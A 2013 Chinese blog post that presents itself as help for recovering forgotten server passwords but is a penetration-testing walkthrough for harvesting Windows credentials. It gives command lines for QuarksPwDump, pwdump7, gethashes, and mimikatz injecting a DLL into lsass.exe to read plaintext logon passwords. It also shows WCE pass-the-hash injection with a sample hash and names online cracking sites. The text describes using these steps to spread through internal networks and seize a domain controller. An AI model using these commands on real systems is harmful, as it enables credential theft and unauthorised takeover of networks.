那些年,我们抓过的hash-服务器密码破解

来源:站长啦 浏览:5451次 时间:2013-12-07
做网站找雨过天晴工作室

     不少站长朋友都拥有自己的服务器,但是有时候会忘记服务器其他用户的密码,怎么办?2个工具可以让你找回的你服务器密码。


以下是详细说明,要工具请联系我要哈。



对于渗透而言,抓hash是必不可少的环节,尤其是内网的时候,好多密码都可以通用~

所以,今天就简单总结一下自己抓hash的一些方法:

0x01:QuarksPwDump
Quarks PwDump是一个Win32环境下系统授权信息导出工具,目前除此之外还木有没有任何一款工具可以导出如此全面的信息,而且支持xP/2003/Vista/7/2008/8,
我就测试2003,由于我是64位的windows7,如果有32的机油也可以试试:
用法参考说明如下:
quarks-pwdump.exe <option(s)> <NTDS file>
Options :参数
      -dump-hash-local                                                                 /*Dump出本机HASH*/
      -dump-hash-domain-cached                                                /*Dump出域内缓存的Hash*/
      -dump-hash-domain (NTDS_FILE must be specified)           /*Dump出域内的Hash,NTDS_FILE必须被指定*/
      –dump-bitlocker (NTDS_FILE must be specified)                  /*Dump出BitLocker遗留信息*/
      –with-history (optional)
      -output-type JOHN/LC (optional, if no=>JOHN)                   /*导出为Lc4或John The Ripper支持的格式*/
      –output FILE (optional, if no=>stdout) 

当然也可以导出为文件:
C:\>quarkspwdump --dump-hash-local --output c:\xxoo

C:\>quarkspwdump --dump-hash-local --output-type LC --output c:\xxoo

其实常用的就是抓本机hash以及抓缓存的域hash
下面上图吧~
首先我们运行quarkspwdump.exe,就会看到如下界面,里面可以看到详细的参数

Quarkspwdump.exe -dump-hash-local

Quarkspedump.exe --dump-hash-domain-cached

总的来说,这款抓hash的神器是比较好用的,最大缺点就是不支持64位

0x02:Pwdump7
这个工具功能就只能读出当前系统的各个用户的密码,内网收集密码的时候很好用:
用法说明:
pwdump7.exe                               直接抓hash
pwdump7.exe -s <samfile> <systemfile>     (Dump passwords from files)
pwdump7.exe -d <filename> [destionation] (Copy filename to destionation)
pwdump7.exe -h                     显示帮助 这个工具最常用的就是直接抓当前系统用户hash
0x03:好多人都用过SAMinside,功能还是比较强大的,但是抓hash的话,我们就介绍其中一个自带的gethashes的小工具,需要系统权限才能执行:
用法很简单,只需要带一个参数$local即可:

Gethashes.exe $local

上面抓到的hash可以去在线破解,当然也可以自己跑,这里提供两个网站:
http://cracker.offensive-security.com/index.php
http://www.objectif-securite.ch/en/ophcrack.php

为了解决那种抓到hash但是破解不出来的情况,于是有了抓明文神器的出现:
0x04:mimikatz
用法:
先提升权限进入到debug模式
Privilege:debug
将sekurlsa.dll注入到lsass.exe进程,这个文件包含了逆向密码的算法,注意这里的sekurlsa.dll也要用绝对路径,而且不要包含中文字符。

Inject::process lsass.exe c:\windows\debug\usermode\mimikatz_1\sekurlsa.dll 

最后一步执行
@getLogonPasswords(这里要注意大小写)
Ps:在远程的时候,抓hash会提示内存不足,那是因为不能跨会话读取内存,所以我们需要用psexec从本地启动cmd
0x05:getpass
其实getpass就是一键化的mimikatz,使用更方便
0x06:wce
这是一款功能比较强大的工具,参数也很多,具体的我就不说了,毕竟上面说了那么多抓hash的神器,你们也动动手,主要讲讲它的hash注入功能:
可以先抓hash,wce -l 
然后
Wce -s Administrator:mik:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F
这点功能在渗透内网的时候很有用处,通常在某个域内的时候,域管理员在某台机器上运行进程时,抓到其hash就可以注入,然后得到域权限~然后就可以控制DC

0x07:总结
本文没有啥亮点,只是把自己平时用的一些东西整理在一起,发出来,如果大家需要就可以看看~这也算支持论坛吧!